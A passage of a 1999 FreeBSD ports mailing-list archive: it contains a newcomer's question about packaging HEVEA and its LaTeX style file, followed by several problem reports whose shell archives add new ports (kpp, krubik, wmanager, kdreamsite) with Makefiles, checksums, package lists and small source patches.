From owner-freebsd-ports Sun Nov 28 0:33:41 1999 Delivered-To: freebsd-ports@freebsd.org Received: from tranq1.tranquility.net (tranq1.tranquility.net [206.156.230.1]) by hub.freebsd.org (Postfix) with ESMTP id 79FE614CE7 for ; Sun, 28 Nov 1999 00:33:38 -0800 (PST) (envelope-from stephen@math.missouri.edu) Received: from math.missouri.edu (stephen.tranquility.net [206.156.230.78]) by tranq1.tranquility.net (8.9.2/8.9.2) with ESMTP id CAA05298 for ; Sun, 28 Nov 1999 02:33:36 -0600 (CST) Message-ID: <3840E8E4.988BE41A@math.missouri.edu> Date: Sun, 28 Nov 1999 02:33:40 -0600 From: Stephen Montgomery-Smith X-Mailer: Mozilla 4.7 [en] (X11; I; Linux 2.0.36 i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-ports@FreeBSD.ORG Subject: Help making port for hevea Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am making my first ever port. It is of HEVEA: http://para.inria.fr/~maranget/hevea/ So it is simple enough. But it creates a file hevea.sty, which it places in /usr/local/lib/hevea. Now I would also like to place this file in a place where it is accessible by latex. I didn't wish to have installation of teTeX as a run depend, because hevea's running does not depend upon there being an installation of latex. But I would like hevea.sty put in an appropriate place. This is my idea. See if /usr/local/share/texmf/tex/latex exists, and if it does, put in there a directory called heavea containing hevea.sty, and then run texhash. So it looks like this: .include TEX_DIR= ${PREFIX}/share/texmf/tex/latex post-install: .if exists(${TEX_DIR}) ${MKDIR} ${TEX_DIR}/hevea ${CP} ${PREFIX}/lib/hevea/hevea.sty ${TEX_DIR}/hevea/hevea.sty texhash .endif Well this doesn't seem very portable to me. I mean, suppose that the teTeX port radically changes it directory structure? Or suppose the person is using the latex port instead of the teTeX port? What do you experienced port makers think I should do? -- Stephen Montgomery-Smith stephen@math.missouri.edu 307 Math Science Building stephen@showme.missouri.edu Department of Mathematics stephen@missouri.edu University of Missouri-Columbia Columbia, MO 65211 USA Phone (573) 882 4540 Fax (573) 882 1869 http://www.math.missouri.edu/~stephen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 0:40: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 942321559B for ; Sun, 28 Nov 1999 00:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA53366; Sun, 28 Nov 1999 00:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pluto.psn.net (pluto.psn.net [207.211.58.12]) by hub.freebsd.org (Postfix) with ESMTP id 2BC5F14CE7 for ; Sun, 28 Nov 1999 00:38:10 -0800 (PST) (envelope-from will@shadow.blackdawn.com) Received: from 5042-243.008.popsite.net ([209.224.140.243] helo=shadow.blackdawn.com) by pluto.psn.net with esmtp (PSN Internet Service 3.03 #1) for FreeBSD-gnats-submit@FreeBSD.ORG id 11rzqS-0002Vd-00; Sun, 28 Nov 1999 01:38:09 -0700 Received: (from will@localhost) by shadow.blackdawn.com (8.9.3/8.9.3) id DAA19804; Sun, 28 Nov 1999 03:38:05 -0500 (EST) (envelope-from will) Message-Id: <199911280838.DAA19804@shadow.blackdawn.com> Date: Sun, 28 Nov 1999 03:38:05 -0500 (EST) From: Will Andrews Reply-To: Will Andrews To: FreeBSD-gnats-submit@FreeBSD.ORG X-Send-Pr-Version: 3.2 Subject: ports/15131: new port: devel/kpp Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15131 >Category: ports >Synopsis: new port: devel/kpp >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 00:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Will Andrews >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: FreeBSD argon.blackdawn.com 4.0-CURRENT FreeBSD 4.0-CURRENT #2: Tue Nov 16 05:42:45 EST 1999 will@:/usr/src/sys/compile/ARGON i386 >Description: Kpp is a KDevelop Project to SPEC converter. I will be sending a PR for the kdevelop program soon now.. >How-To-Repeat: Use the shar below to import the new port to the tree. >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # kpp # kpp/files # kpp/files/md5 # kpp/pkg # kpp/pkg/COMMENT # kpp/pkg/DESCR # kpp/pkg/PLIST # kpp/patches # kpp/patches/patch-aa # kpp/Makefile # echo c - kpp mkdir -p kpp > /dev/null 2>&1 echo c - kpp/files mkdir -p kpp/files > /dev/null 2>&1 echo x - kpp/files/md5 sed 's/^X//' >kpp/files/md5 << 'END-of-kpp/files/md5' XMD5 (kpp-0.15c.tar.gz) = 00651bf267d3153f65f9bf061108c219 END-of-kpp/files/md5 echo c - kpp/pkg mkdir -p kpp/pkg > /dev/null 2>&1 echo x - kpp/pkg/COMMENT sed 's/^X//' >kpp/pkg/COMMENT << 'END-of-kpp/pkg/COMMENT' XKDevelop Project to SPEC file converter. END-of-kpp/pkg/COMMENT echo x - kpp/pkg/DESCR sed 's/^X//' >kpp/pkg/DESCR << 'END-of-kpp/pkg/DESCR' XKpp is a KDevelop Project to SPEC converter. X XWWW: http://www.msoe.edu/~geiseri/projects.phtml?project=Kpp END-of-kpp/pkg/DESCR echo x - kpp/pkg/PLIST sed 's/^X//' >kpp/pkg/PLIST << 'END-of-kpp/pkg/PLIST' Xbin/kpp Xshare/doc/HTML/en/kpp/index.html Xshare/doc/HTML/en/kpp/index-1.html Xshare/doc/HTML/en/kpp/index-2.html Xshare/doc/HTML/en/kpp/index-3.html Xshare/doc/HTML/en/kpp/index-4.html Xshare/doc/HTML/en/kpp/index-5.html Xshare/doc/HTML/en/kpp/index-6.html Xshare/applnk/Applications/kpp.kdelnk Xshare/icons/kpp.xpm Xshare/icons/mini/kpp.xpm Xshare/apps/spec.template X@dirrm share/doc/HTML/en/kpp END-of-kpp/pkg/PLIST echo c - kpp/patches mkdir -p kpp/patches > /dev/null 2>&1 echo x - kpp/patches/patch-aa sed 's/^X//' >kpp/patches/patch-aa << 'END-of-kpp/patches/patch-aa' X--- po/Makefile.in Fri Nov 19 01:42:00 1999 X+++ po/Makefile.in.new Sun Nov 21 19:30:52 1999 X@@ -158,7 +158,7 @@ X POFILES = de.po X X ####### kdevelop will overwrite this part!!! (end)############ X-GMOFILES = $(POFILES:.po=.gmo) X+#GMOFILES = $(POFILES:.po=.gmo) X X localedir = $(kde_locale) X END-of-kpp/patches/patch-aa echo x - kpp/Makefile sed 's/^X//' >kpp/Makefile << 'END-of-kpp/Makefile' X# New ports collection makefile for: kpp X# Version required: 0.15c X# Date created: 19 Nov 1999 X# Whom: Will Andrews X# X# $FreeBSD$ X# X XDISTNAME= kpp-0.15c XCATEGORIES= devel XMASTER_SITES= http X XMAINTAINER= andrews@technologist.com X XLIB_DEPENDS= kdeui.2:${PORTSDIR}/x11/kdelibs11 X XGNU_CONFIGURE= yes XUSE_QT= yes XUSE_NEWGCC= yes XCONFIGURE_ARGS= --prefix=${PREFIX} --datadir=${PREFIX} XCONFIGURE_ENV= KDEDIR="${PREFIX}" X X.include END-of-kpp/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 1: 0: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B9F3B14E1A for ; Sun, 28 Nov 1999 01:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA54316; Sun, 28 Nov 1999 01:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pluto.psn.net (pluto.psn.net [207.211.58.12]) by hub.freebsd.org (Postfix) with ESMTP id A1CCA14C26 for ; Sun, 28 Nov 1999 00:56:47 -0800 (PST) (envelope-from will@shadow.blackdawn.com) Received: from 5042-243.008.popsite.net ([209.224.140.243] helo=shadow.blackdawn.com) by pluto.psn.net with esmtp (PSN Internet Service 3.03 #1) for FreeBSD-gnats-submit@FreeBSD.ORG id 11s08T-0002qs-00; Sun, 28 Nov 1999 01:56:46 -0700 Received: (from will@localhost) by shadow.blackdawn.com (8.9.3/8.9.3) id DAA20461; Sun, 28 Nov 1999 03:56:42 -0500 (EST) (envelope-from will) Message-Id: <199911280856.DAA20461@shadow.blackdawn.com> Date: Sun, 28 Nov 1999 03:56:42 -0500 (EST) From: Will Andrews Reply-To: Will Andrews To: FreeBSD-gnats-submit@FreeBSD.ORG X-Send-Pr-Version: 3.2 Subject: ports/15132: new port: games/krubik Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15132 >Category: ports >Synopsis: new port: games/krubik >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 01:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Will Andrews >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: FreeBSD argon.blackdawn.com 4.0-CURRENT FreeBSD 4.0-CURRENT #2: Tue Nov 16 05:42:45 EST 1999 will@:/usr/src/sys/compile/ARGON i386 >Description: KRubik is a KDE version of the famous Rubik's Cube. Fun game! >How-To-Repeat: Use the shar below to import the new port to the tree. >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # krubik # krubik/files # krubik/files/md5 # krubik/pkg # krubik/pkg/COMMENT # krubik/pkg/DESCR # krubik/pkg/PLIST # krubik/patches # krubik/Makefile # echo c - krubik mkdir -p krubik > /dev/null 2>&1 echo c - krubik/files mkdir -p krubik/files > /dev/null 2>&1 echo x - krubik/files/md5 sed 's/^X//' >krubik/files/md5 << 'END-of-krubik/files/md5' XMD5 (krubik-1.06.tar.gz) = 1fa5a1e35b2a88056fa051d18022ffb4 END-of-krubik/files/md5 echo c - krubik/pkg mkdir -p krubik/pkg > /dev/null 2>&1 echo x - krubik/pkg/COMMENT sed 's/^X//' >krubik/pkg/COMMENT << 'END-of-krubik/pkg/COMMENT' XNeat Rubik game implemented using KDE. END-of-krubik/pkg/COMMENT echo x - krubik/pkg/DESCR sed 's/^X//' >krubik/pkg/DESCR << 'END-of-krubik/pkg/DESCR' XKRubik is a neat KDE-ized version of the famous XRubik game. It is relatively well-developed and Xeasy to use. X XWWW: http://www.phys.uu.nl/~eendebak/kde/krubik.html END-of-krubik/pkg/DESCR echo x - krubik/pkg/PLIST sed 's/^X//' >krubik/pkg/PLIST << 'END-of-krubik/pkg/PLIST' Xbin/krubik Xshare/doc/HTML/en/krubik/devel/index.html Xshare/doc/HTML/en/krubik/devel/heir.html Xshare/doc/HTML/en/krubik/devel/Cube.html Xshare/doc/HTML/en/krubik/devel/Vector.html Xshare/doc/HTML/en/krubik/devel/KRubik.html Xshare/doc/HTML/en/krubik/devel/Kleur.html Xshare/doc/HTML/en/krubik/devel/vector-h.html Xshare/doc/HTML/en/krubik/devel/defines-h.html Xshare/doc/HTML/en/krubik/devel/cube-h.html Xshare/doc/HTML/en/krubik/devel/dialog-h.html Xshare/doc/HTML/en/krubik/devel/includes-h.html Xshare/doc/HTML/en/krubik/devel/krubik-h.html Xshare/doc/HTML/en/krubik/index.html Xshare/doc/HTML/en/krubik/index-1.html Xshare/doc/HTML/en/krubik/index-2.html Xshare/doc/HTML/en/krubik/index-3.html Xshare/doc/HTML/en/krubik/index-4.html Xshare/doc/HTML/en/krubik/index-5.html Xshare/doc/HTML/en/krubik/region.gif Xshare/apps/krubik/example1.cube Xshare/apps/krubik/example2.cube Xshare/apps/krubik/example3.cube Xshare/apps/krubik/example4.cube Xshare/applnk/Games/krubik.kdelnk Xshare/icons/krubik.xpm Xshare/locale/de/LC_MESSAGES/krubik.mo Xshare/locale/es/LC_MESSAGES/krubik.mo Xshare/locale/hr/LC_MESSAGES/krubik.mo Xshare/locale/it/LC_MESSAGES/krubik.mo Xshare/locale/nl/LC_MESSAGES/krubik.mo Xshare/locale/pt/LC_MESSAGES/krubik.mo Xshare/locale/sk/LC_MESSAGES/krubik.mo X@dirrm share/doc/HTML/en/krubik/devel X@dirrm share/doc/HTML/en/krubik X@dirrm share/apps/krubik END-of-krubik/pkg/PLIST echo c - krubik/patches mkdir -p krubik/patches > /dev/null 2>&1 echo x - krubik/Makefile sed 's/^X//' >krubik/Makefile << 'END-of-krubik/Makefile' X# New ports collection makefile for: krubik X# Version required: 1.06 X# Date created: 19 Nov 1999 X# Whom: Will Andrews X# X# $FreeBSD$ X# X XDISTNAME= krubik-1.06 XCATEGORIES= games XMASTER_SITES= http://www.phys.uu.nl/~eendebak/kde/ X XMAINTAINER= andrews@technologist.com X XLIB_DEPENDS= kdeui.2:${PORTSDIR}/x11/kdelibs11 X XGNU_CONFIGURE= yes XUSE_QT= yes XUSE_NEWGCC= yes XCONFIGURE_ARGS= --prefix=${PREFIX} --datadir=${PREFIX} XCONFIGURE_ENV= KDEDIR=${PREFIX} X X.include END-of-krubik/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 1:20: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0B41514C2B for ; Sun, 28 Nov 1999 01:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA55125; Sun, 28 Nov 1999 01:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pluto.psn.net (pluto.psn.net [207.211.58.12]) by hub.freebsd.org (Postfix) with ESMTP id 6480514E1A for ; Sun, 28 Nov 1999 01:13:00 -0800 (PST) (envelope-from will@shadow.blackdawn.com) Received: from 5042-243.008.popsite.net ([209.224.140.243] helo=shadow.blackdawn.com) by pluto.psn.net with esmtp (PSN Internet Service 3.03 #1) for FreeBSD-gnats-submit@FreeBSD.ORG id 11s0OA-00038p-00; Sun, 28 Nov 1999 02:12:59 -0700 Received: (from will@localhost) by shadow.blackdawn.com (8.9.3/8.9.3) id EAA21106; Sun, 28 Nov 1999 04:12:55 -0500 (EST) (envelope-from will) Message-Id: <199911280912.EAA21106@shadow.blackdawn.com> Date: Sun, 28 Nov 1999 04:12:55 -0500 (EST) From: Will Andrews Reply-To: Will Andrews To: FreeBSD-gnats-submit@FreeBSD.ORG X-Send-Pr-Version: 3.2 Subject: ports/15133: new port: x11/wmanager Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15133 >Category: ports >Synopsis: new port: x11/wmanager >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 01:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Will Andrews >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: FreeBSD argon.blackdawn.com 4.0-CURRENT FreeBSD 4.0-CURRENT #2: Tue Nov 16 05:42:45 EST 1999 will@:/usr/src/sys/compile/ARGON i386 >Description: WManager is a neat windowmanager "manager" that allows you to choose between windowmanagers at startup of X. >How-To-Repeat: Use the shar below to import the new port to the tree. >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # wmanager # wmanager/files # wmanager/files/md5 # wmanager/pkg # wmanager/pkg/COMMENT # wmanager/pkg/DESCR # wmanager/pkg/PLIST # wmanager/patches # wmanager/patches/patch-aa # wmanager/patches/patch-ab # wmanager/Makefile # echo c - wmanager mkdir -p wmanager > /dev/null 2>&1 echo c - wmanager/files mkdir -p wmanager/files > /dev/null 2>&1 echo x - wmanager/files/md5 sed 's/^X//' >wmanager/files/md5 << 'END-of-wmanager/files/md5' XMD5 (wmanager-0.2.src.tar.bz2) = 29b00db8ad366fec9211cac3931cf2a0 END-of-wmanager/files/md5 echo c - wmanager/pkg mkdir -p wmanager/pkg > /dev/null 2>&1 echo x - wmanager/pkg/COMMENT sed 's/^X//' >wmanager/pkg/COMMENT << 'END-of-wmanager/pkg/COMMENT' XX11 window manager selector. END-of-wmanager/pkg/COMMENT echo x - wmanager/pkg/DESCR sed 's/^X//' >wmanager/pkg/DESCR << 'END-of-wmanager/pkg/DESCR' XWManager is a windowmanager manager. Quite a tongue twister, eh? XIt "manages" your windowmanagers by letting you choose from your Xfavorites on starting up X. X XWWW: http://heuss.techfak.uni-bielefeld.de/www/mtessmer/wmanager/ END-of-wmanager/pkg/DESCR echo x - wmanager/pkg/PLIST sed 's/^X//' >wmanager/pkg/PLIST << 'END-of-wmanager/pkg/PLIST' Xbin/wmanager Xshare/wmanager/wmanagerrc_sample Xshare/wmanager/xinitrc_sample Xshare/wmanager/FAQ Xshare/wmanager/HISTORY Xshare/wmanager/INSTALL Xshare/wmanager/NEWS Xshare/wmanager/README Xshare/wmanager/TAGS Xshare/wmanager/TODO X@dirrm share/wmanager END-of-wmanager/pkg/PLIST echo c - wmanager/patches mkdir -p wmanager/patches > /dev/null 2>&1 echo x - wmanager/patches/patch-aa sed 's/^X//' >wmanager/patches/patch-aa << 'END-of-wmanager/patches/patch-aa' X--- Makefile Sun Nov 28 04:01:08 1999 X+++ Makefile.new Sun Nov 28 04:05:28 1999 X@@ -23,49 +23,38 @@ X # along with this program; if not, write to the Free Software X # Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. X X- X- X # make settings X SHELL = /bin/sh X MAKEFLAGS = --print-directory X X+# base settings X+bindir = $(prefix)/bin X+incdir = ./inc X+srcdir = ./src X+fltkinc = $(prefix)/include X+x11lib = $(prefix)/lib X X # compiler settings X-CXX = g++ X-CXXFLAGS = -I$(incdir) -O2 -Wall -pedantic #-DDEBUG=1 -g3 X- X+CXX = g++ X+CXXFLAGS= -I$(fltkinc) -I$(incdir) -O2 -Wall -pedantic #-DDEBUG=1 -g3 X X # linker settings X LD = g++ X-LDFLAGS = -lfltk -lXext -lX11 -lm X-LDDIRS = -L/usr/X11R6/lib -L/usr/lib -L/usr/local/lib X- X+LDFLAGS = -lMesaGL -lfltk -lXext -lX11 -lm X+LDDIRS = -L$(x11lib) -L/usr/lib -L/usr/local/lib X X # install settings X INSTALL = /usr/bin/install X INSTALL_FLAGS = --strip X X- X # documentation tool X DOCTOOL = perceps X DOCTOOL_FLAGS = -a -b -f -h -m -r X X-# base locations X-prefix = /usr/local X-exec_prefix = $(prefix) X-bindir = $(exec_prefix)/bin X- X- X-# include files and sources X-incdir = ./inc X-srcdir = ./src X- X- X # documentational files for developer X docdir = ./doc X templates = $(docdir)/templates X X- X # search paths X vpath %.H $(incdir) X vpath %.cc $(srcdir) X@@ -78,11 +67,9 @@ X .wmanagerrc .xinitrc X OBJ = $(patsubst %.cc,%.o,$(SRC)) X X- X # project version X VERSION = 0.1.1 X X- X all: wmanager TAGS X X wmanager: $(OBJ) X@@ -110,7 +97,6 @@ X @-echo -e '\nwmanager - X11 window manager selector' X @-echo 'v$(VERSION) 1999/09/26 by M. Tessmer' X @-echo 'Look at README for more information\n' X- X X # phony targets X .PHONY: all clean distclean TAGS version doc END-of-wmanager/patches/patch-aa echo x - wmanager/patches/patch-ab sed 's/^X//' >wmanager/patches/patch-ab << 'END-of-wmanager/patches/patch-ab' X--- src/WManager.cc Wed Sep 29 13:23:17 1999 X+++ src/WManager.cc.new Fri Nov 19 23:07:25 1999 X@@ -9,6 +9,8 @@ X #include // file streams X #include // only for 'strtok' X #include // for home directory X+#include X+#include X X X // PROJECT INCLUDES //////////////////////////////// END-of-wmanager/patches/patch-ab echo x - wmanager/Makefile sed 's/^X//' >wmanager/Makefile << 'END-of-wmanager/Makefile' X# New ports collection makefile for: wmanager X# Version required: 0.2 X# Date created: 19 Nov 1999 X# Whom: Will Andrews X# X# $FreeBSD$ X# X XDISTNAME= wmanager-0.2 XCATEGORIES= x11 XMASTER_SITES= http://heuss.techfak.uni-bielefeld.de/www/mtessmer/wmanager/ XEXTRACT_SUFX= .src.tar.bz2 X XMAINTAINER= andrews@technologist.com X XLIB_DEPENDS= fltk.1:${PORTSDIR}/x11-toolkits/fltk/ X XUSE_QT= yes XUSE_BZIP2= yes XUSE_GMAKE= yes XUSE_X_PREFIX= yes XMAKE_ENV= prefix=${PREFIX} X XWRKSRC= ${WRKDIR}/wmanager X Xdo-install: X.if !defined(NOPORTDOCS) X @${MKDIR} ${PREFIX}/share/wmanager X @${INSTALL_DATA} ${WRKSRC}/.wmanagerrc ${PREFIX}/share/wmanager/wmanagerrc_sample X @${INSTALL_DATA} ${WRKSRC}/.xinitrc ${PREFIX}/share/wmanager/xinitrc_sample X @${INSTALL_DATA} ${WRKSRC}/FAQ ${PREFIX}/share/wmanager/ X @${INSTALL_DATA} ${WRKSRC}/HISTORY ${PREFIX}/share/wmanager/ X @${INSTALL_DATA} ${WRKSRC}/INSTALL ${PREFIX}/share/wmanager/ X @${INSTALL_DATA} ${WRKSRC}/NEWS ${PREFIX}/share/wmanager/ X @${INSTALL_DATA} ${WRKSRC}/README ${PREFIX}/share/wmanager/ X @${INSTALL_DATA} ${WRKSRC}/TAGS ${PREFIX}/share/wmanager/ X @${INSTALL_DATA} ${WRKSRC}/TODO ${PREFIX}/share/wmanager/ X @${ECHO} X @${ECHO} "Docs have been installed in ${PREFIX}/share/wmanager/." X @${ECHO} "You are advised to have a look at the sample .wmanagerrc" X @${ECHO} "and .xinitrc's available there. X @${ECHO} X X.endif X @${INSTALL_PROGRAM} ${WRKSRC}/wmanager ${PREFIX}/bin X X.include END-of-wmanager/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 1:30:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6C67814DAC for ; Sun, 28 Nov 1999 01:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA55367; Sun, 28 Nov 1999 01:30:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pluto.psn.net (pluto.psn.net [207.211.58.12]) by hub.freebsd.org (Postfix) with ESMTP id 8510914DAC for ; Sun, 28 Nov 1999 01:27:27 -0800 (PST) (envelope-from will@shadow.blackdawn.com) Received: from 5042-243.008.popsite.net ([209.224.140.243] helo=shadow.blackdawn.com) by pluto.psn.net with esmtp (PSN Internet Service 3.03 #1) for FreeBSD-gnats-submit@FreeBSD.ORG id 11s0c6-0003Nf-00; Sun, 28 Nov 1999 02:27:23 -0700 Received: (from will@localhost) by shadow.blackdawn.com (8.9.3/8.9.3) id EAA21609; Sun, 28 Nov 1999 04:27:04 -0500 (EST) (envelope-from will) Message-Id: <199911280927.EAA21609@shadow.blackdawn.com> Date: Sun, 28 Nov 1999 04:27:04 -0500 (EST) From: Will Andrews Reply-To: Will Andrews To: FreeBSD-gnats-submit@FreeBSD.ORG X-Send-Pr-Version: 3.2 Subject: ports/15134: new port: www/kdreamsite Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15134 >Category: ports >Synopsis: new port: www/kdreamsite >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 01:30:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Will Andrews >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: FreeBSD argon.blackdawn.com 4.0-CURRENT FreeBSD 4.0-CURRENT #2: Tue Nov 16 05:42:45 EST 1999 will@:/usr/src/sys/compile/ARGON i386 >Description: KDreamsite is a rather beta-ish WYSIWYG HTML editor. It needed a rather large number of bugfixes, as I have indicated with my patches below. It is also being developed by English-deprived people in Germany, so it is a little difficult to understand.. >How-To-Repeat: Use the shar below to import the new port to the tree. >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # kdreamsite # kdreamsite/files # kdreamsite/files/md5 # kdreamsite/pkg # kdreamsite/pkg/PLIST # kdreamsite/pkg/DESCR # kdreamsite/pkg/COMMENT # kdreamsite/patches # kdreamsite/patches/patch-aa # kdreamsite/patches/patch-ab # kdreamsite/patches/patch-ac # kdreamsite/Makefile # echo c - kdreamsite mkdir -p kdreamsite > /dev/null 2>&1 echo c - kdreamsite/files mkdir -p kdreamsite/files > /dev/null 2>&1 echo x - kdreamsite/files/md5 sed 's/^X//' >kdreamsite/files/md5 << 'END-of-kdreamsite/files/md5' XMD5 (kdreamsite-0.2.tar.gz) = d07f80cad3e41a3854bb8136130a3e72 END-of-kdreamsite/files/md5 echo c - kdreamsite/pkg mkdir -p kdreamsite/pkg > /dev/null 2>&1 echo x - kdreamsite/pkg/PLIST sed 's/^X//' >kdreamsite/pkg/PLIST << 'END-of-kdreamsite/pkg/PLIST' Xbin/kdreamsite Xshare/apps/kdreamsite/toobar/anchor.xpm Xshare/apps/kdreamsite/toobar/block.xpm Xshare/apps/kdreamsite/toobar/bold.xpm Xshare/apps/kdreamsite/toobar/center.xpm Xshare/apps/kdreamsite/toobar/copy.xpm Xshare/apps/kdreamsite/toobar/cut.xpm Xshare/apps/kdreamsite/toobar/date.xpm Xshare/apps/kdreamsite/toobar/image.xpm Xshare/apps/kdreamsite/toobar/italic.xpm Xshare/apps/kdreamsite/toobar/left.xpm Xshare/apps/kdreamsite/toobar/link.xpm Xshare/apps/kdreamsite/toobar/open.xpm Xshare/apps/kdreamsite/toobar/paste.xpm Xshare/apps/kdreamsite/toobar/print.xpm Xshare/apps/kdreamsite/toobar/rgb.xpm Xshare/apps/kdreamsite/toobar/right.xpm Xshare/apps/kdreamsite/toobar/rule.xpm Xshare/apps/kdreamsite/toobar/save.xpm Xshare/apps/kdreamsite/toobar/save_all.xpm Xshare/apps/kdreamsite/toobar/underlined.xpm Xshare/apps/kdreamsite/toobar/undo.xpm Xshare/apps/kdreamsite/pics/aboutlogo.gif Xshare/apps/kdreamsite/pics/startuplogo.gif Xshare/applnk/Applications/kdreamsite.kdelnk Xshare/icons/kdreamsite.xpm Xshare/icons/mini/kdreamsite.xpm Xshare/locale/de/LC_MESSAGES/kdreamsite.mo X@dirrm share/apps/kdreamsite/toobar X@dirrm share/apps/kdreamsite/pics X@dirrm share/apps/kdreamsite END-of-kdreamsite/pkg/PLIST echo x - kdreamsite/pkg/DESCR sed 's/^X//' >kdreamsite/pkg/DESCR << 'END-of-kdreamsite/pkg/DESCR' XKDreamsite is another GUI WYSIWYG HTML editor that Xstill seems to be undergoing development, although Xits future looks bright. X XWWW: http://www.kdreamsite.seite.ms/ X X- Will END-of-kdreamsite/pkg/DESCR echo x - kdreamsite/pkg/COMMENT sed 's/^X//' >kdreamsite/pkg/COMMENT << 'END-of-kdreamsite/pkg/COMMENT' XAnother GUI WYSIWYG HTML editor. END-of-kdreamsite/pkg/COMMENT echo c - kdreamsite/patches mkdir -p kdreamsite/patches > /dev/null 2>&1 echo x - kdreamsite/patches/patch-aa sed 's/^X//' >kdreamsite/patches/patch-aa << 'END-of-kdreamsite/patches/patch-aa' X--- kdreamsite/kwrite/kwdoc.cpp Sun Nov 7 10:17:33 1999 X+++ kdreamsite/kwrite/kwdoc.cpp.new Sat Nov 13 14:43:32 1999 X@@ -1465,7 +1465,7 @@ X len=0; X X for ( i = 0; i < end; i++) s[len+i]=textLine->getChar(i); X- s[i+1] = "\0"; X+ s[i+1] = '\0'; X return s; X } X END-of-kdreamsite/patches/patch-aa echo x - kdreamsite/patches/patch-ab sed 's/^X//' >kdreamsite/patches/patch-ab << 'END-of-kdreamsite/patches/patch-ab' X--- kdreamsite/kwrite/kwview.cpp Sun Nov 7 10:41:28 1999 X+++ kdreamsite/kwrite/kwview.cpp.new Sat Nov 13 14:45:22 1999 X@@ -1514,7 +1514,7 @@ X int KWrite::open() { X QString url; X X- if (!canDiscard()) return; X+ if (!canDiscard()) return -1; X // if (kWriteDoc->hasFileName()) s = QFileInfo(kWriteDoc->fileName()).dirPath(); X // else s = QDir::currentDirPath(); X END-of-kdreamsite/patches/patch-ab echo x - kdreamsite/patches/patch-ac sed 's/^X//' >kdreamsite/patches/patch-ac << 'END-of-kdreamsite/patches/patch-ac' X--- kdreamsite/kdreamsite.cpp Sat Nov 13 17:41:02 1999 X+++ kdreamsite/kdreamsite.cpp.new Sat Nov 13 17:40:56 1999 X@@ -360,7 +360,7 @@ X ************************************************************/ X X void KDreamSite::NewFile() { X- newFile = 